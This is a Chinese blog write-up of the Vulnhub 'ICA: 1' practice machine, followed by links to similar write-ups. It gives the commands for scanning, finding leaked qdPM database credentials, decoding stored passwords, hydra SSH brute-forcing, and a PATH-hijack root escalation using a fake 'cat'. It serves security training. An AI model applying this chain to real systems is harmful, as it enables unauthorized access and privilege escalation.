ICA: 1 靶场详细教学

最新推荐文章于 2024-01-05 13:23:09 发布
最新推荐文章于 2024-01-05 13:23:09 发布
阅读量973 收藏 2
点赞数 1
分类专栏: Vulnhub百个项目渗透 网络安全 文章标签: 安全 web安全 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60374959/article/details/128101389
版权

目录

简介

信息收集

0x01 主机发现

0x02 端口扫描

0x03 目录爆破

漏洞利用

0x04 查找poc

0x05 进入数据库

提权

0x06 内网信息收集 

0x07 提权 

总结

简介

        该靶场前期考验的是我们的信息收集能力,通过信息收集找到一个框架的漏洞,再通过该漏洞进入数据库,找到远程连接ssh的账号密码,通过hydra爆破确认账号密码,内网部分是通过信息收集,主要是通过靶场给的提示去进一步找到文件,然后通过自己创建一个具有权限的文档,达到提权的目的。(有能力的小伙伴可以跟我小编的概述先自己去做一遍,不懂得再去看提升可能会更大哦!)

kali主机:192.168.1.58

靶机:192.168.1.18

信息收集

0x01 主机发现

发现靶机可以使用多种方式,这边举例三种
arp-scan -l      
netdiscover -r 192.168.1.1/24              #当前网段
nmap -sP 192.168.1.1/24                    #当前网段

 

0x02 端口扫描

nmap -sV -T5 -p- -A 192.168.1.18

登入80端口,发现是一个登入界面

 在登入界面中发现下面存在qdPM 9.2的信息

0x03 目录爆破

其实这一步可以不要,这边是使用两种方法去做一个信息收集,上面我们得到那个框架信息我们就可以直接去找漏洞,也就是可以直接跳到漏洞利用部分。

dirb http://192.168.1.18

 把爆破的目录可以都去看看,这边我们主要是看core文件下的config文件里面的databases.yml

 发现mysql的账号密码

账号:qdpmadmin
密码:UcVQCMQk2STVeS6J

 

漏洞利用

0x04 查找poc

上面我们发现qdPM 9.2的信息,我们可以在msf去寻找他的漏洞

searchsploit qdPM 9.2                                        #查询该漏洞
locate php/webapps/50176.txt                                 #查询漏洞poc位置
cp /usr/share/exploitdb/exploits/php/webapps/50176.txt .     #复制该漏洞到当前位置
cat 50176.txt                                                #查看poc

0x05 进入数据库

发现一条默认地址,我们可以访问(上面我们爆破出来了,咱们就直接利用了)

mysql -uqdpmadmin -pUcVQCMQk2STVeS6J -h 192.168.1.18
show databases;
use staff
show tables;
select * from user;
select * from login;

 发现密码是加密的,这里我们直接通过base64解密

账号:
meyer
dexter
travis
lucas
smith

密码:(解密后)
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
cqNnBWCByS2DuJSy
DJceVy98W28Y7wLg

 把他们分别放入users.txt和passwd.txt后,使用hydra爆破。

hydra -L users.txt -P passwd.txt 192.168.1.18 ssh

爆破出两组账号密码
[22][ssh] host: 192.168.1.18   login: dexter   password: 7ZwV4qtg42cmUXGX
[22][ssh] host: 192.168.1.18   login: travis   password: DJceVy98W28Y7wLg

 使用ssh连接

提权

0x06 内网信息收集 

第一个连接travis,连接后发现有个flag,并没有其他可以利用的信息,sudo也不能提权,我们直接跳过到第二个。

ICA{Secret_Project}

登入到dexter

发现一个note.txt

It seems to me that there is a weakness while accessing the system.
As far as I know, the contents of executable files are partially viewable.
I need to find out if there is a vulnerability or not.

 这个时候我们要去寻找一些执行文件,我们通过find去找

 find / -perm -4000 2>/dev/null

 通过验证,发现第一个是存在利用点的

strings get_access

0x07 提权 

这个时候我们发现cat我们调用不了,我们需要自己创建一个。

创建cat时发现其他目录环境不能写入进去,我们得进入/home里去执行。

cd /home 
echo "/bin/bash" > /tmp/cat            #写一个假的cat
export PATH=/tmp:$PATH                 #将当前目录写入到环境
chmod +x /tmp/cat                      #给cat权限
echo $PATH                             #查看有没有写入成功
/opt/get_access                        #执行

 提权成功,去到root目录下找到第二个fiag

 

总结

涉及知识点:

1.信息收集

2.漏洞的查找和利用

收获:这个靶场相对而言是比较简单的,主要是信息收集占大部分时间,利用漏洞点也比较好理解,希望小伙伴可以好好消化里面的知识点。

心"元"意“码”
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ICA1 渗透靶场记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
09-29 635
ICA1 靶场渗透攻略向
vulnhub之ICA1靶机
lionwerson的博客
11-24 3072
https://download.vulnhub.com/ica/ica1.ziphttp://ICA-1靶机下载1.下载靶机,virtualbox网络改为桥接模式,然后开机: 2.nmap扫描一下端口: nmap 192.168.0.11 -p- 有80端口和22端口,先从web端入手: 是一个登录界面,用电子邮箱和用户名登录,不打算先用暴力破解,先sqlmap跑一下: python sqlmap.py -r 1.txt 不过好像不存在sql注入,只能另辟蹊径,这个是一..
【Vulnhub靶场】ICA: 1
DG_s1mple
03-16 3115
环境准备 把下载好的靶机导入到vmware 按照道理来说,这里会给出ip地址,但是我这没有,就得自己探测了 信息收集 使用arp-scan命令来探测靶机的IP地址 靶机IP地址为:192.168.2.16 攻击机IP地址为:192.168.2.17 使用nmap扫描靶机开放的服务和端口 开放了22,80,3306和一个33060端口 渗透开始 我们首先访问它的网站 是一个比较完善的系统,并且下面给出了框架的版本为9.2 我们在kali搜索一下,看有没有已经公开的漏洞 发现有一个漏洞,我们查看一下
Vulnhub靶场 渗透测试实战10:ICA: 1
随心所欲不逾矩
11-28 755
管理员的信息存储在qdpm下的 configuration表中,密码是app_administrator_password的值,可以去把源码下载下来看一下。在我看来,在访问系统时有一个弱点。据我所知,可执行文件的内容是部分可见的。我需要找出是否存在漏洞。qdPM 9.1 安装。
vulhub ica:1靶场
GRXHunter的博客
04-11 3836
vulhub ica1靶场实测
webDD-ICA:webDD ICA的网站50%
03-30
【标题解析】:“webDD-ICA:webDD ICA的网站50%”这个标题可能指的是一个关于webDD-ICA项目的部分完成状态,其中“50%”可能意味着该网站项目已经开发到了一半或者已完成的功能占总体设计的50%。webDD-ICA可能是该...
ICA:使用sklearn的Fast ICA实现对玻璃数据集进行独立成分分析
05-14
1. **数据加载**:首先,我们需要导入必要的库,如`numpy`、`pandas`和`sklearn.decomposition`,并加载玻璃数据集。数据集可能包含了关于不同类型的玻璃的各种特性,如厚度、折射率等。 2. **预处理**:在应用ICA...
matlab灰度处理代码-Overcomplete-ICA:超额ICA
05-23
matlab灰色处理代码超额ICA 该代码基于R,以重现Podosinnikova等人的论文“通过SDP进行过度独立组件分析”。 (2019)。 原始论文和其他一些参考文献都包含在papers/ 。 img/中包含一些复制的图形。 警示语 某些R...
ICA:一种基于OPTICS的增量聚类算法
05-12
无论是否进行聚类,聚类算法都在数据挖掘中起着重要作用。... 特别地,我们提出详细的比较ICA和OPTICS的结果,结果表明ICA更适合于聚类动态数据集,即随着时间的推移将一些新的数据对象添加到数据集中继续。
GI-ICA:GI-ICA和PEGI的Matlab实现-开源
04-28
这是在存在加性高斯噪声的情况下,用于ICA的GI-ICA算法的matlab实现。 James Voss,Luis Rademacher和Mikhail Belkin发表的论文“用于高斯噪声不变独立分量分析的快速算法”中讨论了该算法。
Vulnhub靶机:ica1
最新发布
qq_48904485的博客
01-05 405
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:ica1(10.0.2.5)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/ica-1,748/
vulnhub——ICA1靶机
Re1_zf的博客
11-19 663
访问这个地址可以下载http:///core/config/databases.yml。使用export命令将其添加到环境变量中,伪造的内容为/bin/bash。直接cat的话乱码太多,使用strings获取一下其中的命令字符串信息。明显的cat /root/system.info存在漏洞的可能。这里可以看到这是一个完整的系统,并且给出了系统的版本。但是这里的密码经过了base64加密,需要先解密一下。开放了web服务就先查看一下web服务的信息。搜索一下漏洞信息发现存在一个未授权漏洞。
ica1靶机(hydra爆破)
m0_66299232的博客
12-04 412
靶机链接:百度网盘 请输入提取码提取码:4kn2虚拟机网络链接模式:桥接模式攻击机系统:kali linux 2022.031.探测目标靶机ip2.用nmap探测靶机开放端口和服务nmap -p- -A -sV -T4 192.168.1.1073.用gobuster扫描网站目录gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirb/big.txt -t 100 -x php,txt,html,js,php.bak,txt.bak,
【Vulnhub靶场】ICA: 1 通关writeup
weixin_44588899的博客
05-22 1009
文章目录环境准备信息搜集漏洞利用权限提升 环境准备 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.132 信息搜集 nmap -T4 -p- -A 192.168.220.132 发现开放22、80、3306端口,先打开80端口,发现cms是qdPM9.2版本,在exp-db搜索漏.
ICA:1渗透思路
weixin_54105551的博客
08-11 165
本文是关于ICA:1的渗透思路,刚学习网络安全的小白,所以写的有些水,大佬勿喷
Vulnhub靶场 ICA: 1
小小猪的博客
09-02 602
nmap进行IP服务扫描,发现开放80,22,3306端口。springs进行字符串查看,发现存在cat命令提权。访问并下载下来,发现里面存在mysql的账号密码。进行ssh爆破,密码需要提前解密,用户名全部是小写。访问80端口,可以看到是qdPM 9.2的框架。登录第二个用户,发现存在提示,说存在可执行文件。可以看到提示,存在一个敏感信息泄露文件。进行ssh登录,查看到第一个flag。kali进行漏洞搜索,发现存在。查看表,查看user表内的数据。进行查找,发现第一个存在可疑。权限提升,查找的flag。
安全】vulnhub实验ica1
qq_43017750的博客
12-22 3627
查看当前网卡ip ┌──(kali㉿kali)-[~] └─$ ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.56.102 netmask 255.255.255.0 broadcast 192.168.56.255 inet6 fe80::20c:29ff:feea:9e42 prefixlen 64 scopeid 0x20<lin
独立成分分析ICA系列1:意义
热门推荐
沈春旭的博客
12-14 1万+
1.前言 独立成分分析思想和方法最早源于上世纪八十年代几个法国学者的研究工作,尽管当时他们并没有命名其为ICP;在1986年举行的神经网络计算会议上,法国学者Heraull和Jutten提出了一个基于神经网络模型和Hebb学习准则的方法,来解决盲源分离问题,简称BSS. 混合信号是由相互统计独立的源信号混合而成的。这篇文章提出的算法可以解决具有两个源信号混合的盲源分离问题。他们的工作开
vulnhub-ica1-通关流程 // Kali & 靶场 & 渗透 & Linux
ROSEBUD7_K的博客
08-04 1403
VulnHub ICA1通关流程。// Kali & 靶场 & 渗透 & Linux
ICA: 动态数据集的高效增量OPTICS聚类算法
为了验证ICA的有效性和效率,作者进行了一系列实验,并对算法与OPTICS进行了详细对比。实验结果显示,ICA在处理动态数据集时表现出更好的性能,尤其是在处理新增数据和实时分析方面。这表明ICA是处理现代大数据环境...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

心"元"意“码”

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值